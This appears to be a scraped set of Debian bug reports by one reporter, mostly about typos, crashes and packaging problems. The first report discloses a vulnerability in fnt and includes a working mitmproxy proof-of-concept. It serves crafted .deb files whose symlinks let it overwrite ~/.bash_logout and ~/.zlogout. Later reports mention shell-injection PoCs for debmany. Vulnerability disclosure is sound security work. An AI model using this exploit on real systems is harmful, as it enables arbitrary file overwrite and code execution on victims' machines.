Package: fnt Version: 1.4.1-2 Severity: serious Tags: security https://www.gnu.org/software/tar/manual/html_node/Integrity.html says: "When extracting from two or more untrusted archives, each one should be extracted independently, into different empty directories. Otherwise, the first archive could create a symbolic link into an area outside the working directory, and the second one could follow the link and overwrite data that is not under the working directory." But fnt extracts every data.tar file into the same directory and does not correctly remove files (potentially: malicious symlinks) after extraction. Since fnt downloads debs over HTTP and does not verify their integrity in any way, man-in-the-middle attackers could exploit this vulnerability to overwrite arbitrary files. I've attached a proof-of-concept exploit in the form of a mitmproxy script. -- Jakub Wilk # encoding=UTF-8 # Copyright © 2023 Jakub Wilk # SPDX-License-Identifier: MIT # Usage: # mitmdump --listen-host 127.0.0.1 -s /path/to/fnt_mitm.py # and then: # export http_proxy=http://127.0.0.1:8080/ # fnt update # fnt install symbola # fnt install unifont # logout import contextlib import io import os import subprocess import tarfile import tempfile try: from mitmproxy.http import Response as HTTPResponse # mitmproxy >= 7.0 except ImportError: from mitmproxy.http import HTTPResponse # mitmproxy >= 1.0 payload = b'''\ cowsay pwned sleep inf ''' debs = [] def mkar(members): with tempfile.TemporaryDirectory() as tmpdir: ar_path = f'{tmpdir}/out.ar' subprocess.run(['ar', 'rcS', ar_path, *members], check=True) with open(ar_path, 'rb') as file: return file.read() @contextlib.contextmanager def tmpcwd(): old_cwd = os.getcwd() try: with tempfile.TemporaryDirectory() as tmpdir: os.chdir(tmpdir) yield finally: os.chdir(old_cwd) with tmpcwd(): members = ['debian-binary', 'control.tar.xz', 'data.tar.xz'] for member in members: with open(member, 'wb'): pass with tarfile.open('data.tar.xz', mode='w|xz') as tfile: tinfo = tarfile.TarInfo('par') tinfo.type = tarfile.SYMTYPE tinfo.linkname = '..' tfile.addfile(tinfo) debs += [mkar(members)] with tarfile.open('data.tar.xz', mode='w|xz') as tfile: for target in '.bash_logout', '.zlogout': tinfo = tarfile.TarInfo(f'par/{target}') tinfo.size = len(payload) tfile.addfile(tinfo, io.BytesIO(payload)) debs += [mkar(members)] class state: n = 0 def request(flow): if flow.request.path.endswith('.deb'): flow.response = HTTPResponse.make( 200, debs[state.n], {'Content-Type': 'application/vnd.debian.binary-package'} ) state.n ^= 1 # vim:ts=4 sts=4 sw=4 et
Bug#1042744: pyquery: bad Homepage field
Source: pyquery Apparently pyquery.org has been taken over by spammers. Please update the Homepage field to https://github.com/gawel/pyquery . -- Jakub Wilk
Bug#1042487: neomutt: ANSI headers not decoded
When the From: field contains an umlaut (“ö”), such as: Andreas Rönnquist it then gets encoded for transport and the literal text is: From: Andreas =?UTF-8?B?UsO2bm5xdWlzdA==?= Neomutt properly treats that UTF-8 encoding. However, the 33mail.com forwarding service apparently re-encodes it in ANSI as follows: From: "=?ANSI_X3.4-1968?Q?Andreas_R=3Fnnquist?= 'redacted' via 33Mail" This is a bug in the software than generated this header, not in Neomutt: • ANSI_X3.4-1968 is an alias for US-ASCII, a 7-bit charset that doesn't include the character "ö". • An encoded-word is not allowed inside quoted-string; see RFC 2047 §5. -- Jakub Wilk
Bug#1042397: countmail: 1: from: not found
Package: bsdgames Version: 2.17-29+b1 countmail(6) has an undeclared dependency on mailutils: $ countmail /usr/games/countmail: 1: from: not found ZERO! ZERO MAIL MESSAGES! HAHAHAHAHA! Please add the needed package to Suggests and improve error handling. -- Jakub Wilk
Bug#635765: /bin/dd: dd if=/dev/zero of=testfile_4G bs=4G count=1 produces a 2G file
* Mathieu Malaterre , 2011-07-28 17:49: For some reason the following command: dd if=/dev/zero of=testfile_4G bs=4G count=1 produces a 2G file: $ dd if=/dev/zero of=testfile_4G bs=4G count=1 0+1 records in 0+1 records out 2147479552 bytes (2.1 GB) copied, 64.1528 s, 33.5 MB/s This happens because: * "read() (and similar system calls) will transfer at most 0x7000 (2,147,479,552) bytes". * dd does not continue after a short read, unless you use iflag=fullblock. -- Jakub Wilk
Bug#1023626: grip --clear: "No README found at"
Control: tags -1 + fixed-upstream * Jakub Wilk , 2022-11-07 20:54: grip.exceptions.ReadmeNotFoundError: No README found at . I belive this was fixed upstream in 4.3.0: https://github.com/joeyespo/grip/commit/0253989266911fba -- Jakub Wilk
Bug#1037517: console-setup-linux: wrong char for * A
Package: console-setup-linux Version: 1.221 In X, * A produces "Å" (U+00C5 LATIN CAPITAL LETTER A WITH RING ABOVE). But on the console, I get "Ĺ" (U+0139 LATIN CAPITAL LETTER L WITH ACUTE) instead. -- System Information: Versions of packages console-setup-linux depends on: ii init-system-helpers 1.65.2 ii initscripts 3.06-4 ii kbd 2.5.1-1+b1 ii keyboard-configuration 1.221 console-setup-linux recommends no packages. Versions of packages console-setup-linux suggests: ii console-setup 1.221 Versions of packages keyboard-configuration depends on: ii debconf [debconf-2.0] 1.5.82 ii liblocale-gettext-perl 1.07-5 ii xkb-data2.35.1-1 Versions of packages console-setup depends on: ii debconf [debconf-2.0] 1.5.82 ii keyboard-configuration 1.221 ii xkb-data2.35.1-1 Versions of packages console-setup suggests: ii locales2.36-9 ii sysvinit-utils [lsb-base] 3.06-4 Versions of packages console-setup-linux is related to: pn console-common pn console-data pn console-tools pn gnome-control-center ii kbd 2.5.1-1+b1 ii systemd 252.6-1 /etc/console-setup/remap.inc changed [not included] -- debconf information: keyboard-configuration/layoutcode: pl keyboard-configuration/modelcode: pc105 keyboard-configuration/store_defaults_in_debconf_db: true keyboard-configuration/other: keyboard-configuration/switch: No temporary switch keyboard-configuration/unsupported_layout: true * keyboard-configuration/altgr: The default for the keyboard layout * keyboard-configuration/ctrl_alt_bksp: true keyboard-configuration/unsupported_options: true console-setup/guess_font: * keyboard-configuration/unsupported_config_options: true * console-setup/codeset47: . Combined - Latin; Slavic Cyrillic; Greek console-setup/store_defaults_in_debconf_db: true * console-setup/fontsize-fb47: 8x16 * console-setup/fontface47: TerminusBold * keyboard-configuration/variant: Polish keyboard-configuration/toggle: No toggling * keyboard-configuration/layout: Poland console-setup/fontsize-text47: 8x16 console-setup/framebuffer_only: debian-installer/console-setup-udeb/title: keyboard-configuration/variantcode: * console-setup/charmap47: UTF-8 console-setup/codesetcode: Uni2 keyboard-configuration/xkb-keymap: pl console-setup/use_system_font: * keyboard-configuration/compose: Menu key keyboard-configuration/optionscode: compose:menu,terminate:ctrl_alt_bksp,caps:escape * keyboard-configuration/model: Generic 105-key PC keyboard-configuration/unsupported_config_layout: true console-setup/fontsize: 8x16 -- Jakub Wilk
Bug#1037501: surfraw: broken example (/usr/lib/surfraw/rhyme)
Package: surfraw Version: 2.3.0-2 Severity: minor The surfraw(1) manual page contains the following example: $ /usr/lib/surfraw/rhyme -method=perfect Julian But /usr/lib/surfraw/rhyme does not exist. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
* Simon McVittie , 2023-06-02 19:33: I recently uploaded sdl12-compat version 1.2.64 to experimental, and from some quick testing it seems to run OK with that version. Yup, upgrading libsdl1.2-compat-shim to 1.2.62-1 fixes it for me. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
* Jakub Wilk , 2023-06-02 18:49: ii libsdl1.2-compat-shim [libsdl1.2debian] 1.2.60-1 Looks like it crashes only if libsdl1.2-compat-shim is installed. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
Package: pink-pony Version: 1.4.1-3.1 Severity: grave pink-pony crashes on start: $ pink-pony malloc(): corrupted top size Aborted Or sometimes: $ pink-pony Segmentation fault Or: $ pink-pony Fatal glibc error: malloc assertion failure in _int_malloc: (unsigned long) (size) >= (unsigned long) (nb) Aborted -- System Information: Architecture: i386 Versions of packages pink-pony depends on: ii libc62.36-9 ii libdevil1c2 1.7.8-10+b3 ii libftgl2 2.4.0-2.1 ii libgcc-s112.2.0-14 ii libgl1 1.6.0-1 ii libglfw3 3.3.8-1 ii libglu1-mesa [libglu1] 9.0.2-1.1 ii libimath-3-1-29 3.1.6-1 ii libprotobuf323.21.12-3 ii libsdl-mixer1.2 1.2.12-17+b3 ii libsdl1.2-compat-shim [libsdl1.2debian] 1.2.60-1 ii libsigc++-2.0-0v52.12.0-1 ii libstdc++6 12.2.0-14 ii libtinyxml2.6.2v52.6.2-6 ii pink-pony-data 1.4.1-3.1 -- Jakub Wilk
Bug#1036537: yaml2toml: AttributeError: module 'tomllib' has no attribute 'dumps'
Package: reserialize Version: 20220929-1 yaml2toml doesn't work: $ yaml2toml /dev/null Traceback (most recent call last): File "/usr/bin/yaml2toml", line 93, in data = str_dumpers[otype](data) File "/usr/bin/yaml2toml", line 53, in "toml": lambda arg: toml.dumps(arg), ^^ AttributeError: module 'tomllib' has no attribute 'dumps' -- System Information: Architecture: i386 Versions of packages reserialize depends on: ii python3-yaml 6.0-3+b2 ii python3 3.11.2-1+b1 Versions of packages reserialize recommends: un python3-bson ii python3-toml 0.10.2-1 -- Jakub Wilk
Bug#1036536: toml2yaml: TypeError: File must be opened in binary mode
Package: reserialize Version: 20220929-1 toml2yaml doesn't work: $ toml2yaml /dev/null Traceback (most recent call last): File "/usr/bin/toml2yaml", line 87, in data = fh_loaders[itype](ifh) ^^ File "/usr/bin/toml2yaml", line 29, in "toml": lambda fh: toml.load(fh), ^ File "/usr/lib/python3.11/tomllib/_parser.py", line 63, in load raise TypeError( TypeError: File must be opened in binary mode, e.g. use `open('foo.toml', 'rb')` -- System Information: Architecture: i386 Versions of packages reserialize depends on: ii python3-yaml 6.0-3+b2 ii python3 3.11.2-1+b1 Versions of packages reserialize recommends: un python3-bson ii python3-toml 0.10.2-1 -- Jakub Wilk
Bug#1035418: aiksaurus: no Homepage field
Source: aiksaurus Version: 1.2.1+dev-0.12-7 Severity: minor Please add Homepage: https://aiksaurus.sourceforge.net/ to debian/control. -- Jakub Wilk
Bug#1034540: rhvoice: out of date language list
Package: rhvoice Version: 1.8.0+dfsg-3 Severity: minor The package description reads: Initially, RHVoice could speak only Russian. Now it also supports English, Esperanto and Georgian. There are many other supported languages these days. -- Jakub Wilk
Bug#1034520: python3-cairo: unhelpful upstream changelog
Package: python3-cairo Version: 1.20.1-5+b1 This is unhelpful: $ zcat /usr/share/doc/python3-cairo/changelog.gz Changelog = .. currentmodule:: cairo .. include:: ../NEWS -- Jakub Wilk
Bug#1034514: python3-fastimport: "git" missing from description
Package: python3-fastimport Version: 0.9.14-2.1 Please mention "git" somewhere in the package description. -- Jakub Wilk
Bug#1033973: devscripts: syntax error in salsa bash completion
Package: devscripts Version: 2.23.3 Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Wed, 5 Apr 2023 12:08:23 +0200 Subject: [PATCH] Fix syntax error in salsa bash completion Reported-by: Unit 193 --- scripts/salsa.bash_completion | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/salsa.bash_completion b/scripts/salsa.bash_completion index a2d0a7bc..2dbebcbb 100644 --- a/scripts/salsa.bash_completion +++ b/scripts/salsa.bash_completion @@ -15,7 +15,7 @@ _salsa_completion () { opts+=" --disable-kgb --disable-tagpending --group --group-id" opts+=" --enable-remove-source-branch --disable-remove-source-branch" opts+=" --issues --mr --repo --forks --lfs --packages --jobs --pages" -opts+=" --container --analytics --requirements --wiki --snippets +opts+=" --container --analytics --requirements --wiki --snippets" opts+=" --releases --auto-devops --request-acc --ci-config-path" opts+=" --mr-allow-squash --no-mr-allow-squash --mr-desc --mr-title" opts+=" --mr-dst-branch --mr-dst-project --mr-remove-source-branch" -- 2.40.0
Bug#1033328: basez: typo: witn -> with
Package: basez Version: 1.6.2-1 Severity: minor Tags: patch -- Jakub Wilk --- a/basez.1 +++ b/basez.1 @@ -57,7 +57,7 @@ with equal sign end padding. Appearance end of the encoded steam can be avoided by encoding data of size divisible by 5. Base32 decoding is case insensitive. .PP -Base32hex encoding works the same way as base32 but witn an alternative +Base32hex encoding works the same way as base32 but with an alternative character\-set [0\-9a\-v] to preserve the encoded data sort order. This encoding should not be confused with base32. .PP --- a/basez.c +++ b/basez.c @@ -509,7 +509,7 @@ APPNAME "by 5. Base32 decoding is case insensitive.\n" ); puts( -"Base32hex encoding works the same way as base32 but witn an alternative \n" +"Base32hex encoding works the same way as base32 but with an alternative \n" "character-set [0-9a-v] to preserve the encoded data sort order. \n" "This encoding should not be confused with base32.\n" );
Bug#1033248: ITP: python-onetimepad -- python library for the onetimepad algorithm
* Matthias Geiger , 2023-03-20 18:36: https://github.com/jailuthra/onetimepad Misleading package name. Should be: python-toy-xor-encryption-do-not-use. No, really, don't upload this to Debian. it's a dependency for banking (#1013317). It seems banking uses this via an embedded copy of <https://github.com/harshnative/pysqlitecipher>, which is also horrifying. -- Jakub Wilk
Bug#995822: fbset: modeline2fb: fbset is (1), not (8)
There's another fbset(8) reference in the fb.modes man page: $ man fb.modes | grep -Ewo 'fbset[()0-9]+' fbset(8) -- Jakub Wilk
Bug#1032477: filters man page: lowercase "lolcat"
Package: filters Version: 2.55-3 Severity: minor $ man filters.6 | grep -w lolcat lolcat As seen in internet gifs everywhere. But "lolcat" was renamed to "LOLCAT" in 2.52 (bug #760910). -- Jakub Wilk
Bug#1032472: fonts-oxygen: out of date package description?
Package: fonts-oxygen Version: 4:5.4.3-4 The package description reads: "a bold weight, plus regular and bold italics, and a monospace version will be made". But bold and monospace versions are already shipped by this package. -- Jakub Wilk
Bug#1032337: devscripts: missing dep list in package description
Package: devscripts Version: 2.23.2 The dependency list is missing from the package description: $ dpkg -I devscripts_2.23.2_i386.deb | tail -n3 Description: scripts to make the life of a Debian Package maintainer easier Contains the following scripts, dependencies/recommendations shown in brackets afterwards: -- Jakub Wilk
Bug#1032302: sbuild: Lintian exit status confusion
Package: sbuild Version: 0.85.0 The following code in Sbuild/Build.pm is for interpreting Lintian exit status: my $status = $? >> 8; my $why = "unknown reason"; $self->set('Lintian Reason', 'fail') if ($status == 1); $why = "runtime error" if ($status == 2); $why = "policy violation" if ($status == 1); This used to match what Lintian did (and what was documented it did); but the exist status semantics has been changed in Lintian 2.77.0: * Reverse the exit statuses for program errors and policy violations. (Re: #709932) So now when Lintian reports a policy violation, sbuild says it's a runtime error, and other way round. -- Jakub Wilk
Bug#1032278: ttf-bitstream-vera: out-of-date reference to ttf-dejavu in package description
Package: ttf-bitstream-vera Version: 1.10-8.2 The package description reads: use ttf-dejavu instead But ttf-dejavu had been a transitional package since 2013, and it was finally removed in 2020 (see bug #872809). Please do s/ttf-dejavu/fonts-dejavu/. -- Jakub Wilk
Bug#1032177: faketime doesn't fake time (on i386)
Package: faketime Version: 0.9.10-2.1 Severity: grave faketime no longer works on i386: $ faketime -f '2008-12-24 08:15:42' date -R Wed, 01 Mar 2023 08:25:58 +0100 -- System Information: Architecture: i386 Versions of packages faketime depends on: ii libfaketime 0.9.10-2.1 ii libc62.36-8 -- Jakub Wilk
Bug#1032149: criterion: U+FFFC OBJECT REPLACEMENT CHARACTER in package descriptions
Source: criterion Version: 2.4.1-1 Severity: minor The lists in the package descriptions are indented with object replacement characters (U+FFFC). This is weird. Please replace them with spaces: sed -i -e 's/\xEF\xBF\xBC/ /' debian/control -- Jakub Wilk
Bug#1021425: debmany: "The package does not exist" when in exists in cwd
* Axel Beckert , 2022-10-08 14:49: So maybe we need an "apt-get print-uris" (or "apt-cache print-uris") subcommand analogous to the "apt reinstall" shortcut for "apt --reinstall install") which reliably shows that URI independent of any current package state or downloaded files. Such an option for APT would be indeed useful, but in the mean time, debmany could just chdir into a directory that doesn't contain any *.deb files before running "apt-get --print-uris ...". See the attached patch. -- Jakub Wilk diff --git a/debmany/debmany b/debmany/debmany index dfea6e9..7a6029a 100755 --- a/debmany/debmany +++ b/debmany/debmany @@ -279,11 +279,11 @@ else if [ -z "$file" ] then debug "Mode3: Determining the path of '$package' using 'apt-get -q2 --print-uris download'" # comment -aptdata=`apt-get -q2 --print-uris download "$package" 2>/dev/null | grep "$package"_` +aptdata=`cd / && apt-get -q2 --print-uris download "$package" 2>/dev/null | grep "$package"_` if [ -z "$aptdata" ] then errormsg "There was an error looking for package '$package'." - aptdata=`apt-get -q2 --print-uris download "apt" 2>/dev/null | grep "apt"_` + aptdata=`cd / && apt-get -q2 --print-uris download "apt" 2>/dev/null | grep "apt"_` if [ $? -ne 0 ] || [ -z "$aptdata" ] ; then # If looking for apt fails then there is something amiss error "Apt-get might not be working properly Possible failure when running 'apt-get -q2 --print-uris download \"$package\"'"
Bug#1031938: debmany: dialog option injection
Control: tags -1 + security * Jakub Wilk , 2023-02-25 17:51: PoC exploit that tries to append malicious code to /home/alice/.bash_logout. The code that generated the crafted .deb is here: https://github.com/jwilk/crafted.deb/blob/master/gen-deb1031938-debmany -- Jakub Wilk
Bug#1031549: debchange man page: uneven indentation in option list
Package: devscripts Version: 2.23.1 Severity: minor Tags: patch -- Jakub Wilk diff --git a/scripts/debchange.1 b/scripts/debchange.1 index 752a4503..d1f02de3 100644 --- a/scripts/debchange.1 +++ b/scripts/debchange.1 @@ -314,7 +314,7 @@ Preserve the source tree directory name if the upstream version number (or the version number of a Debian native package) changes. See also the configuration variables section below. .TP -\fB \-\-no\-preserve\fR, \fB\-\-nopreserve\fR +\fB\-\-no\-preserve\fR, \fB\-\-nopreserve\fR Do not preserve the source tree directory name (default). .TP \fB\-\-vendor \fIvendor\fR
Bug#1031516: fbterm: typos in package description
Package: fbterm Version: 1.7-5 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Fri, 17 Feb 2023 16:52:27 +0100 Subject: [PATCH] Fix typos in package description --- debian/control | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/debian/control b/debian/control index 95a387d..112d435 100644 --- a/debian/control +++ b/debian/control @@ -20,11 +20,11 @@ Description: fast framebuffer based terminal emulator for Linux enabled on framebuffer device * select font with fontconfig and draw text with freetype2, same as Qt/Gtk+ based GUI apps - * dynamicly create/destroy up to 10 windows initially running default shell + * dynamically create/destroy up to 10 windows initially running default shell * record scrollback history for every window * auto-detect current locale and convert text encoding, support double width scripts like Chinese, Japanese etc * switch between configurable additional text encoding with hot keys on the fly - * copy/past selected text between windows with mouse when gpm server is + * copy/paste selected text between windows with mouse when gpm server is running -- 2.39.2
Bug#1031515: fbterm: missing tags 1.7-3, 1.7-5
Source: fbterm Tags for 1.7-3 and 1.7-5 are missing from the git repo: $ git ls-remote https://salsa.debian.org/debian/fbterm.git 'refs/tags/debian/1.7-*[0-9]' bd1616f26a09a4f2ca58b7712643367eb6053bf3 refs/tags/debian/1.7-1 f41d4eff26affc40f8e3c06ed54142625549eb96 refs/tags/debian/1.7-2 0ce83f9b23187655e8809880895033390f942452 refs/tags/debian/1.7-4 -- Jakub Wilk
Bug#1031294: doc-debian: misspelled "Control: forwarded"
Package: doc-debian Version: 6.5 bug-reporting.txt gives the following example: Control: forward -1 https://bugs.debian.org/nnn This should be "forwarded", not "forward". It's been already fixed on the website: #863069 -- Jakub Wilk
Bug#1031267: debmany: shell injection
* Jakub Wilk , 2023-02-14 10:53: attached proof-of-concept exploit. The code that generated the crafted .deb is here: https://github.com/jwilk/crafted.deb/blob/master/gen-deb1031267-debmany -- Jakub Wilk
Bug#1031241: aspic: no upstream URL in copyright file
Package: aspic Version: 2.00+dfsg-1 Severity: serious Justification: Policy 12.5 The copyright file doesn't say where the upstream sources were obtained. -- Jakub Wilk
Bug#1031218: /etc/init.d/apt-cacher-ng: unholy mixture of tabs and spaces
Package: apt-cacher-ng Version: 3.7.4-1 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Mon, 13 Feb 2023 12:09:17 +0100 Subject: [PATCH] Expand tabs in init script --- debian/apt-cacher-ng.init | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/debian/apt-cacher-ng.init b/debian/apt-cacher-ng.init index 27f42b9..126da9c 100644 --- a/debian/apt-cacher-ng.init +++ b/debian/apt-cacher-ng.init @@ -26,7 +26,7 @@ test -x $DAEMON || exit 0 # Include apt-cacher-ng defaults if available if [ -f /etc/default/apt-cacher-ng ] ; then - . /etc/default/apt-cacher-ng + . /etc/default/apt-cacher-ng fi # our runtime state files directory, will be purged on startup! @@ -44,7 +44,7 @@ do_start() { do_stop() { - if ! start-stop-daemon --stop --retry 15 --quiet --pidfile $PIDFILE \ + if ! start-stop-daemon --stop --retry 15 --quiet --pidfile $PIDFILE \ --exec $DAEMON then if ! test -e "$PIDFILE" && ! start-stop-daemon --stop \ @@ -55,7 +55,7 @@ do_stop() { fi rm -f $PIDFILE return 0 - + } case "$1" in -- 2.39.1
Bug#1031083: python3-injector: stray reStructuredText markup in package description
Package: python3-injector Version: 0.19.0-2 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Sat, 11 Feb 2023 12:39:53 +0100 Subject: [PATCH] Remove stray reST markup from package description --- debian/control | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/debian/control b/debian/control index c5b65f3..963777a 100644 --- a/debian/control +++ b/debian/control @@ -32,6 +32,6 @@ Description: Python dependency injection framework . That's where Injector can help. It automatically and transitively provides dependencies for you. As an added benefit, Injector encourages - nicely compartmentalised code through the use of :ref:modules . + nicely compartmentalised code through the use of modules. . This package installs the library for Python 3. -- 2.39.1
Bug#1030892: maxima: tab causes "fatal error" and "Segmentation violation"
* Camm Maguire , 2023-02-08 17:24: Greetings, and thanks for your report! I cannot reproduce this. As a data point, I get the crash on i386, but not on amd64. Are you running in a terminal or in an emacs shell? Terminal. If you precede the tabs with :lisp (si::readline-off) does the problem go away? Yes, it does. -- Jakub Wilk
Bug#1030892: maxima: tab causes "fatal error" and "Segmentation violation"
Package: maxima Version: 5.46.0-8 Maxima crashes when I press tab twice: $ maxima -q (%i1) Maxima encountered a Lisp error: Condition in MACSYMA-TOP-LEVEL [or a callee]: INTERNAL-SIMPLE-ERROR: Caught fatal error [memory may be damaged] Automatically continuing. To enable the Lisp debugger set *debugger-hook* to nil. (%i1) Unrecoverable error: Segmentation violation.. Aborted -- System Information: Architecture: i386 Versions of packages maxima depends on: ii libc6 2.36-8 ii libedit2 3.1-20221030-2 ii libgmp10 2:6.2.1+dfsg1-1.1 ii libtirpc3 1.3.3+ds-1 ii libx11-6 2:1.8.3-3 -- Jakub Wilk
Bug#1027833: user-mode-linux: hostfs directory traversal
* Ritesh Raj Sarraf , 2023-01-20 16:59: The current upstream documentation does warn about the functionality, and does not advertise anything about confining the namespace. Er, but it does talk about confinement: Hostfs without any parameters to the UML Image will allow the image to mount any part of the host filesystem and write to it. Always confine hostfs to a specific "harmless" directory (for example ``/var/tmp``) if running UML. This is especially important if UML is being run as root. -- Jakub Wilk
Bug#1009187: calendar: Outdated entry "Jul 22 National Day in Poland"
* Andrzej A. Filip , 2022-04-08 15:14: "Jul 22 National Day in Poland" is no longer valid. [File /usr/share/calendar/calendar.holiday line 302 ] How embarrassing. It was a communist holiday, which was abolished in 1990: https://en.wikipedia.org/wiki/National_Day_of_the_Rebirth_of_Poland As a data point, OpenBSD fixed this in 2006: https://github.com/openbsd/src/commit/7eadb65f7d736d8a -- Jakub Wilk
Bug#1030816: displayfont turns off UTF-8 mode
Package: console-cyrillic Version: 0.9-17.2 Apparently displayfont(1) turns off the UTF-8 mode: $ printf $'\u263A\n' # U+263A WHITE SMILING FACE ☺ $ displayfont | tail -n1 $ printf $'\u263A\n' âÿº -- Jakub Wilk
Bug#1030808: calendar: mojibake "C=E9dric"
Package: calendar Version: 12.1.7+nmu3 Severity: minor I saw this mojibake in today's calendar: $ calendar | grep Boutillier Feb 07 Debian Bug#70 reported by C=E9dric Boutillier, 2013 It should be "Cédric". -- System Information: Architecture: i386 Versions of packages calendar depends on: ii libbsd0 0.11.7-2 ii libc62.36-8 ii cpp 4:12.2.0-3 -- Jakub Wilk
Bug#610882: gpm: Unclear messages in syslog
* Helge Kreutzmann , 2011-01-23 18:23: In the syslog I see messages like: /usr/sbin/gpm[3519]: Request on 8 (console 10) Another annoyed user here. This seems to be emitted in src/daemon/processrequest.c, at the beginning of function processRequest. To reproduce, just run mc(1). If these messages are harmless As far as can I see, they are harmless. -- Jakub Wilk
Bug#968388: build-rdeps: with dose-extra, lists too many rdeps
* Christian Kastner , 2020-08-14 10:58: Given the command `build-rdeps python3-pygments`, without package dose-extra installed, I get a warning WARNING: dose-extra >= 4.0 is not installed. Falling back to old unreliable behaviour. and it produces a reasonable 73 packages as output. With dose-extra installed, the same command produces 1,748(!) packages, which cannot be true. Most of them build-depend on python3-sphinx, which depends on python3-pygments. In my experience, you almost always want --old. -- Jakub Wilk
Bug#1030141: build-rdeps man page: undocumented -q
Package: devscripts Version: 2.22.2 The -q option is not documented in the build-rdeps(1) man page. (Only --quiet is.) -- Jakub Wilk
Bug#1030115: opensnitch-ui: AttributeError: module 'PyQt5.Qt' has no attribute 'QItemDelegate'
Package: python3-opensnitch-ui Version: 1.5.3-1 Severity: grave Control: forwarded -1 https://github.com/evilsocket/opensnitch/issues/821 opensnitch-ui does not start: $ opensnitch-ui Themes not available. Install qt-material if you want to change GUI's appearance: pip3 install qt-material. Traceback (most recent call last): File "/usr/bin/opensnitch-ui", line 23, in from opensnitch.service import UIService File "/usr/lib/python3/dist-packages/opensnitch/service.py", line 17, in from opensnitch.dialogs.stats import StatsDialog File "/usr/lib/python3/dist-packages/opensnitch/dialogs/stats.py", line 18, in from opensnitch.customwidgets.main import ColorizedDelegate, ConnectionsTableModel File "/usr/lib/python3/dist-packages/opensnitch/customwidgets/main.py", line 11, in class ColorizedDelegate(Qt.QItemDelegate): AttributeError: module 'PyQt5.Qt' has no attribute 'QItemDelegate' -- System Information: Architecture: i386 Versions of packages python3-opensnitch-ui depends on: ii debconf 1.5.82 ii libqt5sql5-sqlite5.15.8+dfsg-2 ii python3-grpcio 1.51.1-3 ii python3-notify2 0.3-5 ii python3-pyinotify0.9.6-2 ii python3-pyqt55.15.8+dfsg-1 ii python3-pyqt5.qtsql 5.15.8+dfsg-1 ii python3-setuptools 66.1.1-1 ii python3-six 1.16.0-4 ii python3-slugify 4.0.0-2 ii python3 3.11.1-3 ii dialog 1.3-20221229-1 -- Jakub Wilk
Bug#1018958: coreutils: stty default output doesn't actually show "deviations from stty sane" for c_cc[VTIME] and c_cc[VMIN]
Another setting that stty without arguments doesn't show is ixon: $ sh -c 'stty sane; stty ixon; stty; stty -ixon; stty; stty sane' speed 38400 baud; line = 0; speed 38400 baud; line = 0; -- Jakub Wilk
Bug#1029150: toilet -E troff: Segmentation fault
Package: toilet Version: 0.3-1.4 "toilet -E troff" crashes: $ toilet -E troff foo Segmentation fault Backtrace: #0 __GI_strlen () at ../sysdeps/i386/i586/strlen.S:50 #1 0xf7c5f7a9 in __vfprintf_internal (s=0xd28c, format=0xf7f93ba0 "\\M[%s]", ap=, mode_flags=6) at ./stdio-common/vfprintf-process-arg.c:397 #2 0xf7c75821 in __vsprintf_internal (string=0x56565f4d "\\M[ ", maxlen=4294967295, format=0xf7f93ba0 "\\M[%s]", args=0xd390 "\001", mode_flags=6) at ./libio/iovsprintf.c:96 #3 0xf7d31532 in ___sprintf_chk (s=0x56565f4d "\\M[ ", flag=1, slen=4294967295, format=0xf7f93ba0 "\\M[%s]") at ./debug/sprintf_chk.c:40 #4 0xf7ee9fdb in sprintf (__fmt=0xf7f93ba0 "\\M[%s]", __s=0x56565f4d "\\M[ ") at /usr/include/i386-linux-gnu/bits/stdio2.h:38 #5 export_troff (bytes=0xd438, cv=0x56564ae0) at codec/export.c:1056 #6 caca_export_canvas_to_memory (cv=0x56564ae0, format=0xd82a "troff", bytes=0xd438) at codec/export.c:136 #7 0x56556a5d in render_flush (cx=cx@entry=0xd4ec) at ./src/render.c:157 #8 0x56556d9b in render_list (cx=0xd4ec, argc=1, argv=0xd630) at ./src/render.c:128 #9 0x5655686f in main (argc=4, argv=0xd624) at ./src/main.c:194 -- System Information: Architecture: i386 Versions of packages toilet depends on: ii libc6 2.36-8 ii libcaca0 0.99.beta20-3 ii toilet-fonts 0.3-1.4 Versions of packages toilet suggests: ii figlet 2.2.5-3 -- Jakub Wilk
Bug#1029106: make: new upstream release (4.4)
Source: make-dfsg Severity: wishlist -- Jakub Wilk
Bug#1025267: Nimbus Roman: wrong glyph for ₤ (U+20A4 LIRA SIGN)
* Fabian Greffrath , 2022-12-01 21:21: Would you please do me a favor and forward this issue to the upstream git tracker? Don't count on me. Sorry! -- Jakub Wilk